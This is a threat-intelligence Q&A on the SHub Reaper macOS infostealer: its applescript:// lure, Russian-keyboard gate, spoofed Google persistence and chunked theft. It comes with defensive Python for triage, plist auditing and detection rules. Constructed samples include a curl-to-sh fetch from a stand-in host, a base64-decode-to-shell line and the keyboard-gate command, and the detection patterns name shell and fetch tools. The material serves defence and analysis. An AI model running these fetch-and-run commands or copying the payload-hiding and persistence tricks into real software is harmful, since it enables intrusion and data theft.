In a rapidly evolving landscape of macOS infostealers, the SHub Reaper variant stands out for its sophisticated blend of social engineering, terminal-less execution, and multi-company spoofing. Originally observed by researchers at Moonlock, Jamf, and Malwarebytes, the SHub family has now been refined by threat actors to bypass Apple's security mitigations and deliver a payload that impersonates Apple, Google, and Microsoft across different stages. This Q&A breaks down the key aspects of the SHub Reaper attack chain, from its unique delivery via the applescript:// URL scheme to its persistence and data theft capabilities.
What is SHub Reaper and how does it differ from earlier SHub variants?
SHub Reaper is the latest iteration of the SHub Stealer malware family targeting macOS users. Unlike its predecessors that relied on fake installers and the “ClickFix” technique (tricking victims into pasting terminal commands), Reaper introduces a terminal-less delivery method. It uses the applescript:// URL scheme to launch the macOS Script Editor pre-filled with a malicious AppleScript. This bypasses Apple’s Tahoe 26.4 mitigation that was designed to block the old “ClickFix” flow. Another key difference is the infection chain’s disguise: it spoofs Microsoft, Apple, and Google at different stages, using a typo-squatted Microsoft domain for payload hosting, an Apple XProtectRemediator update message during execution, and a fake Google Software Update directory for persistence. Additionally, Reaper adds an AMOS-style document theft module with chunked uploads.

How does the SHub Reaper malware trick users into running the malicious script?
The delivery starts with a lure that mimics a WeChat or Miro installer. When the victim interacts with it, an HTML page constructs a malicious AppleScript dynamically. The script is padded with ASCII art and fake terms so that the harmful code sits below the visible area of the Script Editor window. The page then opens Script Editor automatically through the applescript:// URL scheme, and the victim sees only harmless-looking text unless they scroll down. If the user clicks Run, the AppleScript displays a fake update message referencing Apple’s XProtectRemediator tool (e.g., Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg) while silently decoding and executing a curl command that fetches the first-stage shell-script stub. Because the code is executed by Script Editor rather than pasted into Terminal, the Terminal-paste mitigation described above is never involved, and the Apple-branded message and support URL make the Run click feel routine.
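The triage a responder would do on such a lure, as an added example that is not part of the original article or of any vendor tooling: pull the script out of the applescript:// URL, count how much padding precedes the first do shell script call, and decode the base64 blob that the shell line hands to base64 -d. The URL shape used here (applescript://com.apple.scripteditor?action=new&script=) follows Script Editor's published URL scheme; the padding text, the stub URL https://example.invalid/stub.sh, and the whole sample script are constructed for illustration and are not the real lure.

```python
"""Triage an applescript:// lure: extract the script from the URL, find the
payload hidden below the padding, and decode any base64 passed to a shell.
Added example, not SHub Reaper's code; the sample lure below is constructed."""
import base64
import re
from urllib.parse import parse_qs, quote, urlparse

STAGE0_CMD = "curl -fsSL https://example.invalid/stub.sh | sh"  # hypothetical stub URL

# Constructed padding: the real lure uses far more so the payload scrolls
# out of the Script Editor window; six copies are enough to show the idea.
PADDING_BLOCK = [
    "-- =====================================================",
    "--   ____  _   _       _     ___           _        _ _ ",
    "--  / ___|| | | |_   _| |__ |_ _|_ __  ___| |_ __ _| | |",
    "-- Terms of Service: by continuing you accept the terms",
    "-- =====================================================",
]
SAMPLE_SCRIPT = "\n".join(PADDING_BLOCK * 6 + [
    'display dialog "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg"',
    'do shell script "echo ' + base64.b64encode(STAGE0_CMD.encode()).decode() + ' | base64 -d | sh"',
])
SAMPLE_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(SAMPLE_SCRIPT)


def extract_script(url: str) -> str:
    """Return the percent-decoded `script` parameter of an applescript:// URL."""
    parsed = urlparse(url)
    if parsed.scheme != "applescript":
        raise ValueError("not an applescript:// URL")
    return parse_qs(parsed.query).get("script", [""])[0]


def triage(script: str) -> dict:
    """Locate the first shell call, decode base64 blobs on shell lines, list URLs."""
    lines = script.splitlines()
    shell_lines = [i for i, line in enumerate(lines) if "do shell script" in line]
    decoded = []
    for i in shell_lines:
        # Any long base64-alphabet run on a shell line is worth decoding.
        for blob in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", lines[i]):
            try:
                decoded.append(base64.b64decode(blob, validate=True).decode())
            except (ValueError, UnicodeDecodeError):
                pass
    text = script + "\n" + "\n".join(decoded)
    return {
        "lines_before_payload": shell_lines[0] if shell_lines else len(lines),
        "shell_cmds": [lines[i] for i in shell_lines],
        "decoded": decoded,
        "urls": re.findall(r"https?://[^\s\"']+", text),
    }


def main():
    report = triage(extract_script(SAMPLE_URL))
    print(f"payload starts after {report['lines_before_payload']} lines of padding")
    for cmd in report["decoded"]:
        print("decoded shell payload:", cmd)
    print("URLs referenced:", report["urls"])


if __name__ == "__main__":
    main()
```

The URL list deliberately mixes the decoy (the Apple support link shown to the user) with the real fetch target that only appears after decoding; in a live case the second one is the network indicator to pivot on.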
What environment checks does Reaper perform before executing its payload?
Once the initial shell-script stub runs, it first checks which keyboard input sources are enabled by reading com.apple.HIToolbox.plist and looking for a Russian layout, using a command like defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources | grep -qi russian. Note that this is a keyboard-layout check rather than a system-locale check: a user whose interface language is English but who has added a Russian keyboard still matches. If a Russian input source is present, which the operators take as a sign that the user is in the Commonwealth of Independent States (CIS) region, the malware sends a cis_blocked telemetry event to its command-and-control (C2) server and exits without executing further stages. This is a deliberate evasion common in crimeware operated from that region: it avoids victims whose compromise could draw local law-enforcement attention. Only after passing this check does the malware download the additional stages.
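The gate as the stub performs it, reproduced against an in-memory copy of com.apple.HIToolbox.plist. This is an added example, not the malware's own code: the plist is constructed (a real one carries more keys, and the layout IDs are illustrative), and the telemetry sender is a stub that only records what would be sent. It shows why the grep works: defaults read prints the whole nested AppleEnabledInputSources array, so a case-insensitive match on any string inside it is enough.

```python
"""The CIS-region gate from the first-stage stub, run against a constructed
com.apple.HIToolbox.plist. Added example, not the malware's code."""
import plistlib

# Constructed HIToolbox plist: a U.S. layout plus a Russian one.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>AppleEnabledInputSources</key>
  <array>
    <dict><key>InputSourceKind</key><string>Keyboard Layout</string>
          <key>KeyboardLayout ID</key><integer>0</integer>
          <key>KeyboardLayout Name</key><string>U.S.</string></dict>
    <dict><key>InputSourceKind</key><string>Keyboard Layout</string>
          <key>KeyboardLayout ID</key><integer>19456</integer>
          <key>KeyboardLayout Name</key><string>Russian</string></dict>
  </array>
</dict></plist>"""

# Same structure with only the U.S. layout, for the pass-through case.
US_ONLY_PLIST = plistlib.dumps({"AppleEnabledInputSources": [
    {"InputSourceKind": "Keyboard Layout", "KeyboardLayout ID": 0, "KeyboardLayout Name": "U.S."},
]})


def _strings(value):
    """Yield every string inside a nested plist value (dict keys included)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield key
            yield from _strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from _strings(item)


def has_russian_input_source(plist_bytes: bytes) -> bool:
    """Equivalent of `defaults read ... AppleEnabledInputSources | grep -qi russian`:
    defaults read dumps the whole array, so grep matches any string within it."""
    sources = plistlib.loads(plist_bytes).get("AppleEnabledInputSources", [])
    return any("russian" in s.lower() for s in _strings(sources))


def gate(plist_bytes: bytes, telemetry: list) -> bool:
    """Return True if the stub would continue to the next stage; on a Russian
    layout it records the cis_blocked event (stubbed here) and returns False."""
    if has_russian_input_source(plist_bytes):
        telemetry.append("cis_blocked")  # real stub POSTs this to the C2, then exits
        return False
    return True


if __name__ == "__main__":
    sent = []
    print("continue:", gate(SAMPLE_PLIST, sent), "telemetry:", sent)
    print("continue:", gate(US_ONLY_PLIST, sent), "telemetry:", sent)
```

Run on a real Mac, the same logic applies to the bytes of ~/Library/Preferences/com.apple.HIToolbox.plist; a host that passed the gate is the one that went on to pull the next stage.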
How does SHub Reaper achieve persistence on an infected macOS system?
To maintain long-term access, Reaper uses a persistence strategy that mimics legitimate Google software. After the initial payload executes, it creates a directory that resembles a Google Software Update location, such as ~/Library/Application Support/Google/Software Update/, and places a copy of itself (or the component it wants relaunched) there. It then registers a launchd job whose program path points at this fake location, so the malicious code runs again at each login or boot. The report describes this as a LaunchAgent or LaunchDaemon; note the practical difference: a LaunchAgent in ~/Library/LaunchAgents needs no elevated privileges and runs at each login of that user, whereas a LaunchDaemon in /Library/LaunchDaemons requires root to install and runs at boot, so the user-level agent is the more likely form unless the chain has obtained admin rights. By spoofing Google’s update directory, the persistence mechanism hides in plain sight among the Google folders that Chrome users already have under Application Support, making it harder for casual inspection or basic security tooling to flag. The persistence component may additionally use process names and file icons that blend in with typical system utilities.
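A launchd job audit for this persistence pattern, added here as an example rather than taken from the article or any vendor: it reads a job plist, resolves the program launchd would run (Program or ProgramArguments), and flags a program path under the spoofed Google/Software Update directory, a Google-style label backed by such a path, a job that runs an interpreter or curl directly, and the RunAtLoad+KeepAlive combination that relaunches a killed process. The two plists are constructed; the label com.google.keystone.helper and binary name GoogleSoftwareUpdate in the suspect one are hypothetical. Google's real updater (Keystone) installs under ~/Library/Google/GoogleSoftwareUpdate/, which is why a path under Application Support/Google/Software Update/ is treated as suspicious on its own.

```python
"""Audit launchd job plists for the spoofed Google update persistence.
Added example; the plists are constructed and the suspect label/binary are
hypothetical."""
import os
import plistlib

SPOOFED_DIR = "/Library/Application Support/Google/Software Update/"  # path pattern from the report
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "curl"}

SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.helper",  # hypothetical spoofed label
    "ProgramArguments": [
        "/Users/victim/Library/Application Support/Google/Software Update/GoogleSoftwareUpdate",
        "--run",
    ],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.nightly-backup",  # hypothetical benign job
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
    "StartCalendarInterval": {"Hour": 3, "Minute": 0},
})


def program_of(job: dict) -> list:
    """launchd accepts either Program or ProgramArguments; return argv either way."""
    if job.get("ProgramArguments"):
        return list(job["ProgramArguments"])
    return [job["Program"]] if job.get("Program") else []


def audit_job(plist_bytes: bytes) -> list:
    """Return a list of findings for one job plist (empty means nothing matched)."""
    job = plistlib.loads(plist_bytes)
    argv = program_of(job)
    exe = argv[0] if argv else ""
    findings = []
    if SPOOFED_DIR in exe or any(SPOOFED_DIR in arg for arg in argv[1:]):
        findings.append(f"program under spoofed Google/Software Update directory: {exe}")
    if os.path.basename(exe) in INTERPRETERS:
        findings.append(f"job runs an interpreter or fetcher directly: {exe}")
    if job.get("Label", "").startswith("com.google.") and SPOOFED_DIR in exe:
        findings.append("Google-style label backed by a program under the spoofed directory")
    if findings and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: starts at login and is relaunched if killed")
    return findings


def audit_dirs(dirs=("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")) -> dict:
    """Walk the usual launchd job directories on a live Mac; returns {path: findings}."""
    results = {}
    for d in dirs:
        d = os.path.expanduser(d)
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    findings = audit_job(fh.read())
            except (OSError, plistlib.InvalidFileException) as err:
                findings = [f"unreadable plist: {err}"]
            if findings:
                results[path] = findings
    return results


if __name__ == "__main__":
    print("suspect:", audit_job(SUSPECT_PLIST))
    print("benign:", audit_job(BENIGN_PLIST))
    for path, findings in audit_dirs().items():
        print(path, findings)
```

The RunAtLoad+KeepAlive note is only reported alongside another finding, because plenty of legitimate agents set both; on its own it is not an indicator.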

What data does the SHub Reaper document theft module target, and how does it exfiltrate files?
Reaper includes an AMOS-style document theft module—named after the Atomic macOS Stealer (AMOS) family—that actively scans the victim’s machine for sensitive files. It targets common document formats such as PDFs, Word documents, Excel spreadsheets, text files, and possibly cryptocurrency wallet data, browser passwords, or keychain entries. What sets this module apart is its exfiltration method: instead of sending entire files at once, it chunks the uploads. This means large documents are split into smaller pieces and sent to the C2 server sequentially. Chunking reduces the likelihood of triggering network-based alerts that might look for large outbound transfer volumes, and it also allows the malware to resume uploads if interrupted. The file paths are enumerated, and each chunk is transmitted via HTTPS POST requests to a remote server controlled by the attackers.
What are the key indicators of compromise (IOCs) for detecting SHub Reaper?
Defenders can look for several telltale signs of a SHub Reaper infection. Network indicators include connections to typo-squatted Microsoft look-alike domains used for payload delivery, and HTTPS traffic to C2 servers carrying the cis_blocked telemetry event (a host that sends it has already run the stub, even though the stub then exits). On the host, watch for Script Editor.app spawning sh, curl, or other shell children, which is exactly what a do shell script call inside the lure produces, and for AppleScript files or applescript:// URL launches the user did not initiate. Persistence clues include LaunchAgents or LaunchDaemons whose program path lies under ~/Library/Application Support/Google/Software Update/, which is not where Google’s own updater (Keystone, under ~/Library/Google/GoogleSoftwareUpdate/) lives. The malware also drops a stub shell script that decodes base64 content before running it; any such script in /tmp/ or under ~/Library/ should be investigated, as should defaults read commands against com.apple.HIToolbox.plist piped into grep. Finally, monitor for curl launched from AppleScript-driven shells and for executables whose names contain spaces outside an .app bundle, a trick meant to make them blend into casual reading of process lists.
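The host-side indicators above turned into detection logic over process-execution records, as an added example that is neither the article's nor any vendor's rule set. The records are constructed JSON lines in a made-up schema (pid, ppid, exe, cmdline), so map the field names to whatever your EDR or eslogger output actually carries; the paths, pids and the stub URL https://example.invalid/stub.sh are illustrative. Two details matter in practice and are handled here: the parent check walks the ancestry so a curl spawned by a shell spawned by Script Editor is still caught, and the spaced-name rule excludes executables inside .app bundles, since Google Chrome and Script Editor itself legitimately have spaces in their names.

```python
"""Run the SHub Reaper host indicators over constructed process-exec records.
Added example, not a vendor rule set; schema and sample data are made up."""
import json
import os
import re

SAMPLE_LOG = r'''
{"pid": 1, "ppid": 0, "exe": "/sbin/launchd", "cmdline": "launchd"}
{"pid": 410, "ppid": 1, "exe": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", "cmdline": "Google Chrome"}
{"pid": 500, "ppid": 1, "exe": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "cmdline": "Script Editor"}
{"pid": 522, "ppid": 500, "exe": "/bin/sh", "cmdline": "sh -c defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources | grep -qi russian"}
{"pid": 523, "ppid": 500, "exe": "/bin/sh", "cmdline": "sh -c echo Y3VybCAuLi4= | base64 -d | sh"}
{"pid": 524, "ppid": 523, "exe": "/usr/bin/curl", "cmdline": "curl -fsSL https://example.invalid/stub.sh"}
{"pid": 611, "ppid": 1, "exe": "/Users/victim/Library/Application Support/Google/Software Update/GoogleSoftwareUpdate", "cmdline": "GoogleSoftwareUpdate --run"}
{"pid": 612, "ppid": 1, "exe": "/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent", "cmdline": "GoogleSoftwareUpdateAgent"}
{"pid": 700, "ppid": 300, "exe": "/usr/bin/defaults", "cmdline": "defaults read com.apple.dock autohide"}
{"pid": 701, "ppid": 1, "exe": "/tmp/.cache/com.apple .helper", "cmdline": "com.apple .helper"}
'''

SPOOFED_DIR = "/Library/Application Support/Google/Software Update/"
SHELLS_AND_FETCHERS = {"sh", "bash", "zsh", "curl", "osascript"}
B64_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sh|bash|zsh)\b")


def parse(log_text: str) -> dict:
    """Index the JSON-lines records by pid."""
    records = [json.loads(line) for line in log_text.splitlines() if line.strip()]
    return {rec["pid"]: rec for rec in records}


def name(rec: dict) -> str:
    return os.path.basename(rec["exe"])


def descends_from(rec: dict, ancestor: str, by_pid: dict) -> bool:
    """Walk ppid links; True if any ancestor's executable name matches."""
    seen = set()
    cur = by_pid.get(rec["ppid"])
    while cur and cur["pid"] not in seen:
        if name(cur) == ancestor:
            return True
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return False


def rules(rec: dict, by_pid: dict) -> list:
    """Return the names of every indicator this record matches."""
    cmd = rec["cmdline"]
    hits = []
    if "HIToolbox" in cmd and "russian" in cmd.lower():
        hits.append("hitoolbox-russian-gate")          # the CIS-region check
    if name(rec) in SHELLS_AND_FETCHERS and descends_from(rec, "Script Editor", by_pid):
        hits.append("shell-or-curl-under-script-editor")  # do shell script in the lure
    if B64_TO_SHELL.search(cmd):
        hits.append("base64-decode-piped-to-shell")    # the stub's decode-and-run
    if SPOOFED_DIR in rec["exe"] or SPOOFED_DIR in cmd:
        hits.append("spoofed-google-update-path")      # persistence location
    if " " in name(rec) and ".app/" not in rec["exe"]:
        hits.append("spaced-exe-name-outside-bundle")  # Chrome/Script Editor excluded
    return hits


def detect(log_text: str) -> list:
    """Return sorted (pid, rule) pairs for every matching record."""
    by_pid = parse(log_text)
    return sorted((pid, rule) for pid, rec in by_pid.items() for rule in rules(rec, by_pid))


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_LOG):
        print(f"pid {pid}: {rule}")
```

Note what does not fire: the genuine Keystone agent (pid 612), a user's own defaults read (pid 700), and Chrome (pid 410); the rules are tuned so the Google-themed disguise is caught by path, not by the word Google.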